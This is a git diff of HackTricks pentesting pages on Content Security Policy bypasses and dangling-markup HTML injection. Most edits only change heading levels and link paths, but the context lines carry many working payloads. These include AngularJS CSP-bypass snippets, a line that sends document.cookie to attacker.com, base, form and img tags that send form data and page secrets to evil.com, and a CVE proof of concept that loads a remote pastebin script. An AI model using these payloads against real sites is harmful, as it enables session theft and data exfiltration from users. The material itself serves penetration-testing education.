From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)). From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)).
## Third Party Endpoints + 'unsafe-eval' ### Third Party Endpoints + 'unsafe-eval'
```yaml ```yaml
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval'; Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
@ -171,7 +170,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div> <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
``` ```
### Other payloads: #### Other payloads:
```markup ```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
@ -187,7 +186,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)> <div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
``` ```
## Third Party Endpoints + JSONP ### Third Party Endpoints + JSONP
```http ```http
Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none'; Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none';
@ -204,22 +203,22 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect**, because if the initial endpoint is trusted, redirects are trusted. The same vulnerability will occur if the **trusted endpoint contains an Open Redirect**, because if the initial endpoint is trusted, redirects are trusted.
## Folder path bypass ### Folder path bypass
If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree on that.\ If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree on that.\
This leads to a possible bypass, by using "**%2f..%2f**" if server decodes it. For example, if CSP allows `http://example.com/company/` you can bypass the folder restriction and execute: `http://example.com/company%2f..%2fattacker/file.js` This leads to a possible bypass, by using "**%2f..%2f**" if server decodes it. For example, if CSP allows `http://example.com/company/` you can bypass the folder restriction and execute: `http://example.com/company%2f..%2fattacker/file.js`
Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output) Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
## Iframes JS execution ### Iframes JS execution
{% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %} {% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
[iframes-in-xss-and-csp.md](../xss-cross-site-scripting/iframes-in-xss-and-csp.md) [iframes-in-xss-and-csp.md](../xss-cross-site-scripting/iframes-in-xss-and-csp.md)
{% endcontent-ref %} {% endcontent-ref %}
## missing **base-uri** ### missing **base-uri**
If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection.md). If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/).
Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\ Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
If the vulnerable page is loaded with **httpS**, make use a httpS url in the base. If the vulnerable page is loaded with **httpS**, make use a httpS url in the base.
@ -228,7 +227,7 @@ If the vulnerable page is loaded with **httpS**, make use a httpS url in the bas
<base href="https://www.attacker.com/"> <base href="https://www.attacker.com/">
``` ```
## AngularJS events ### AngularJS events
Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this: Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this:
@ -239,7 +238,7 @@ Depending on the specific policy, the CSP will block JavaScript events. However,
**Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) **Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
## AngularJS and whitelisted domain ### AngularJS and whitelisted domain
``` ```
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url; Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
@ -254,11 +253,11 @@ Working payloads:
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script> ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
``` ```
## Bypass CSP with dangling markup ### Bypass CSP with dangling markup
Read [how here](../dangling-markup-html-scriptless-injection.md). Read [how here](../dangling-markup-html-scriptless-injection/).
## 'unsafe-inline'; img-src \*; via XSS ### 'unsafe-inline'; img-src \*; via XSS
``` ```
default-src 'self' 'unsafe-inline'; img-src *; default-src 'self' 'unsafe-inline'; img-src *;
@ -276,7 +275,7 @@ From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](
You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/) You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
## img-src \*; via XSS (iframe) - Time attack ### img-src \*; via XSS (iframe) - Time attack
Notice the lack of the directive `'unsafe-inline'`\ Notice the lack of the directive `'unsafe-inline'`\
This time you can make the victim **load** a page in **your control** via **XSS** with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information (**CSRF**). You cannot access the content of the page, but if somehow you can **control the time the page needs to load** you can extract the information you need. This time you can make the victim **load** a page in **your control** via **XSS** with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information (**CSRF**). You cannot access the content of the page, but if somehow you can **control the time the page needs to load** you can extract the information you need.
@ -342,13 +341,13 @@ run();
</script> </script>
``` ```
## [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/) ### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
```javascript ```javascript
document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>"; document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>";
``` ```
## Leaking Information CSP + Iframe ### Leaking Information CSP + Iframe
Imagine a situation where a **page is redirecting** to a different **page with a secret depending** on the **user**. For example the user **admin** accessing **redirectme.domain1.com** is redirected to: **adminsecret321.domain2.com** and you can cause a XSS to the admin.\ Imagine a situation where a **page is redirecting** to a different **page with a secret depending** on the **user**. For example the user **admin** accessing **redirectme.domain1.com** is redirected to: **adminsecret321.domain2.com** and you can cause a XSS to the admin.\
**Also the page redirected isn't allowed by the security policy, but the page that redirects is.** **Also the page redirected isn't allowed by the security policy, but the page that redirects is.**
@ -368,11 +367,11 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
Trick from [**here**](https://ctftime.org/writeup/29310). Trick from [**here**](https://ctftime.org/writeup/29310).
# CSP Exfiltration Bypasses ## CSP Exfiltration Bypasses
If there is a strict CSP that doesn't allow you to **interact with external servers**, there some things you can always do to exfiltrate the information. If there is a strict CSP that doesn't allow you to **interact with external servers**, there some things you can always do to exfiltrate the information.
## Location ### Location
You could just update the location to send to the attackers server the secret information: You could just update the location to send to the attackers server the secret information:
@ -381,7 +380,7 @@ var sessionid = document.cookie.split('=')[1]+".";
document.location = "https://attacker.com/?" + sessionid; document.location = "https://attacker.com/?" + sessionid;
``` ```
## Meta tag ### Meta tag
You could redirect injecting a meta tag (this is just a redirect, this won't leak content) You could redirect injecting a meta tag (this is just a redirect, this won't leak content)
@ -389,7 +388,7 @@ You could redirect injecting a meta tag (this is just a redirect, this won't lea
<meta http-equiv="refresh" content="1; http://attacker.com"> <meta http-equiv="refresh" content="1; http://attacker.com">
``` ```
## DNS Prefetch ### DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for a later usage.\ To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for a later usage.\
You can indicate a browser to pre-resolve a hostname with: `<link reol="dns-prefetch" href="something.com">` You can indicate a browser to pre-resolve a hostname with: `<link reol="dns-prefetch" href="something.com">`
@ -421,7 +420,7 @@ X-DNS-Prefetch-Control: off
Apparently this technique doesn't work in headless browsers (bots) Apparently this technique doesn't work in headless browsers (bots)
{% endhint %} {% endhint %}
## WebRTC ### WebRTC
In several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP. In several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP.
@ -432,13 +431,13 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));
However, it doesn't look like it's [not possible anymore](https://github.com/w3c/webrtc-nv-use-cases/issues/35) (or at least not that easy). However, it doesn't look like it's [not possible anymore](https://github.com/w3c/webrtc-nv-use-cases/issues/35) (or at least not that easy).
If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)**** If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)\*\*\*\*
# Policy Injection ## Policy Injection
**Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection) **Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)
## Chrome ### Chrome
If a **parameter** sent by you is being **pasted inside** the **declaration** of the **policy,** then you could **alter** the **policy** in some way that makes **it useless**. You could **allow script 'unsafe-inline'** with any of these bypasses: If a **parameter** sent by you is being **pasted inside** the **declaration** of the **policy,** then you could **alter** the **policy** in some way that makes **it useless**. You could **allow script 'unsafe-inline'** with any of these bypasses:
@ -450,21 +449,21 @@ script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
Because this directive will **overwrite existing script-src directives**.\ Because this directive will **overwrite existing script-src directives**.\
You can find an example here: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E) You can find an example here: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
## Edge ### Edge
In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop** the entire **policy**.\ In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop** the entire **policy**.\
Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E) Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
# Checking CSP Policies Online ## Checking CSP Policies Online
* [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com) * [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
* [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/) * [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
# Automatically creating CSP ## Automatically creating CSP
[https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy) [https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)
# References ## References
{% embed url="https://hackdefense.com/blog/csp-the-how-and-why-of-a-content-security-policy/" %} {% embed url="https://hackdefense.com/blog/csp-the-how-and-why-of-a-content-security-policy/" %}
@ -474,7 +473,6 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme" %} {% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme" %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -490,5 +488,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -183,7 +183,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
### **Exfiltrating CSRF Token** ### **Exfiltrating CSRF Token**
If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability. If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
### **GET using HTML tags** ### **GET using HTML tags**

View file

@ -1,4 +1,4 @@
# Dangling Markup - HTML scriptless injection
<details> <details>
@ -16,17 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Resume
# Resume This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/)but you can **inject some HTML tags**.\
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.\
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution. It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
Several techniques commented here can be used to bypass some [**Content Security Policy**](content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...). Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
# Main Applications ## Main Applications
## Stealing clear text secrets ### Stealing clear text secrets
If you inject `<img src='http://evil.com/log.cgi?` when the page is loaded the victim will send you all the code between the injected `img` tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t(you can do the same thing using a double quote,take a look which could be more interesting to use). If you inject `<img src='http://evil.com/log.cgi?` when the page is loaded the victim will send you all the code between the injected `img` tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t(you can do the same thing using a double quote,take a look which could be more interesting to use).
@ -60,7 +59,7 @@ You could also insert a `<base` tag. All the information will be sent until the
steal me'<b>test</b> steal me'<b>test</b>
``` ```
## Stealing forms ### Stealing forms
```markup ```markup
<base href='http://evil.com/'> <base href='http://evil.com/'>
@ -68,11 +67,11 @@ steal me'<b>test</b>
Then, the forms that send data to path (like `<form action='update_profile.php'>`) will send the data to the malicious domain. Then, the forms that send data to path (like `<form action='update_profile.php'>`) will send the data to the malicious domain.
## Stealing forms 2 ### Stealing forms 2
Set a form header: `<form action='http://evil.com/log_steal'>` this will overwrite the next form header and all the data from the form will be sent to the attacker. Set a form header: `<form action='http://evil.com/log_steal'>` this will overwrite the next form header and all the data from the form will be sent to the attacker.
## Stealing forms 3 ### Stealing forms 3
The button can change the URL where the information of the form is going to be sent with the attribute "formaction": The button can change the URL where the information of the form is going to be sent with the attribute "formaction":
@ -82,7 +81,7 @@ The button can change the URL where the information of the form is going to be s
An attacker can use this to steal the information. An attacker can use this to steal the information.
## Stealing clear text secrets 2 ### Stealing clear text secrets 2
Using the latest mentioned technique to steal forms (injecting a new form header) you can then inject a new input field: Using the latest mentioned technique to steal forms (injecting a new form header) you can then inject a new input field:
@ -98,7 +97,7 @@ You can do the same thing injecting a form and an `<option>` tag. All the data u
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option <form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
``` ```
## Form parameter injection ### Form parameter injection
You can change the path of a form and insert new values so an unexpected action will be performed: You can change the path of a form and insert new values so an unexpected action will be performed:
@ -116,7 +115,7 @@ You can change the path of a form and insert new values so an unexpected action
</form> </form>
``` ```
## Stealing clear text secrets via noscript ### Stealing clear text secrets via noscript
`<noscript></noscript>` Is a tag whose content will be interpreted if the browser doesn't support javascript (you can enable/disable Javascript in Chrome in [chrome://settings/content/javascript](chrome://settings/content/javascript)). `<noscript></noscript>` Is a tag whose content will be interpreted if the browser doesn't support javascript (you can enable/disable Javascript in Chrome in [chrome://settings/content/javascript](chrome://settings/content/javascript)).
@ -126,7 +125,7 @@ A way to exfiltrate the content of the web page from the point of injection to t
<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript> <noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
``` ```
## Bypassing CSP with user interaction ### Bypassing CSP with user interaction
From this [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) you can learn that even from the **most CSP restricted** environments you can still **exfiltrate data** with some **user interaction**. In this occasion we are going to use the payload: From this [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) you can learn that even from the **most CSP restricted** environments you can still **exfiltrate data** with some **user interaction**. In this occasion we are going to use the payload:
@ -145,7 +144,7 @@ if(window.name) {
</script> </script>
``` ```
## Misleading script workflow 1 - HTML namespace attack ### Misleading script workflow 1 - HTML namespace attack
Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared: Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared:
@ -164,7 +163,7 @@ function submit_status_update() {
} }
``` ```
## Misleading script workflow 2 - Script namespace attack ### Misleading script workflow 2 - Script namespace attack
Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application: Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application:
@ -190,7 +189,7 @@ function submit_new_acls() {
} }
``` ```
## Abuse of JSONP ### Abuse of JSONP
If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data: If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data:
@ -212,7 +211,7 @@ Or you can even try to execute some javascript:
<script src='/search?q=a&call=alert(1)'></script> <script src='/search?q=a&call=alert(1)'></script>
``` ```
## Iframe abuse ### Iframe abuse
Notice that a **child document can view and set location property for parent, even if cross-origin.** This means that you can make the client access any other page by loading inside an **iframe** some code like: Notice that a **child document can view and set location property for parent, even if cross-origin.** This means that you can make the client access any other page by loading inside an **iframe** some code like:
@ -222,13 +221,13 @@ Notice that a **child document can view and set location property for parent, ev
This can be mitigated with something like: _**sandbox= allow-scripts allow-top-navigation**_ This can be mitigated with something like: _**sandbox= allow-scripts allow-top-navigation**_
## \<meta abuse ### \<meta abuse
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />` You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
This can be **avoided** with a **CSP** regarding **http-equiv** ( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`) This can be **avoided** with a **CSP** regarding **http-equiv** ( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`)
## New \<portal HTML tag ### New \<portal HTML tag
You can find a very **interesting research** on exploitable vulnerabilities of the \<portal tag [here](https://research.securitum.com/security-analysis-of-portal-element/).\ You can find a very **interesting research** on exploitable vulnerabilities of the \<portal tag [here](https://research.securitum.com/security-analysis-of-portal-element/).\
At the moment of this writing you need to enable the portal tag on Chrome in `chrome://flags/#enable-portals` or it won't work. At the moment of this writing you need to enable the portal tag on Chrome in `chrome://flags/#enable-portals` or it won't work.
@ -237,23 +236,23 @@ At the moment of this writing you need to enable the portal tag on Chrome in `ch
<portal src='https://attacker-server? <portal src='https://attacker-server?
``` ```
## HTML Leaks ### HTML Leaks
Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html) Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
# Char-by-char Leaks ## Char-by-char Leaks
You can find techniques like **CSS injection or Lazy Load Images** explained in this post to **leak secrets from a HTML without JS execution char by char**: You can find techniques like **CSS injection or Lazy Load Images** explained in this post to **leak secrets from a HTML without JS execution char by char**:
{% content-ref url="dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/" %} {% content-ref url="html-injection-char-by-char-exfiltration/" %}
[html-injection-char-by-char-exfiltration](dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/) [html-injection-char-by-char-exfiltration](html-injection-char-by-char-exfiltration/)
{% endcontent-ref %} {% endcontent-ref %}
# Brute-Force Detection List ## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %} {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
# References ## References
All the techniques presented here and more can view reviewed with more details in: All the techniques presented here and more can view reviewed with more details in:
@ -267,7 +266,6 @@ More info:
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %} {% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -283,5 +281,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -46,7 +46,7 @@ If the introduced data may somehow being reflected in the response, the page mig
* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md) * [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)
* [ ] [**Command Injection**](command-injection.md) * [ ] [**Command Injection**](command-injection.md)
* [ ] [**CRLF**](crlf-0d-0a.md) * [ ] [**CRLF**](crlf-0d-0a.md)
* [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) * [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection/)
* [ ] [**File Inclusion/Path Traversal**](file-inclusion/) * [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
* [ ] [**Open Redirect**](open-redirect.md) * [ ] [**Open Redirect**](open-redirect.md)
* [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss) * [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)

View file

@ -37,7 +37,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2. Can you use events or attributes supporting `javascript:` protocol? 2. Can you use events or attributes supporting `javascript:` protocol?
3. Can you bypass protections? 3. Can you bypass protections?
4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md). 4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection.md)? 5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/)?
2. Inside a **HTML tag**: 2. Inside a **HTML tag**:
1. Can you exit to raw HTML context? 1. Can you exit to raw HTML context?
2. Can you create new events/attributes to execute JS code? 2. Can you create new events/attributes to execute JS code?
@ -225,7 +225,7 @@ If in order to exploit the vulnerability you need the **user to click a link or
#### Impossible - Dangling Markup #### Impossible - Dangling Markup
If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection.md)because you could **exploit** the vulnerability **without** executing **JS** code. If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/)because you could **exploit** the vulnerability **without** executing **JS** code.
### Injecting inside HTML tag ### Injecting inside HTML tag

View file

@ -1,4 +1,4 @@
# Stealing Sensitive Information Disclosure from a Web
<details> <details>
@ -16,15 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.\ If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.\
Here I present you the main ways to can try to achieve it: Here I present you the main ways to can try to achieve it:
* [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page. * [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page.
* [**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. * [**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. * [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
* [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)). * [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
<details> <details>
@ -41,5 +39,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
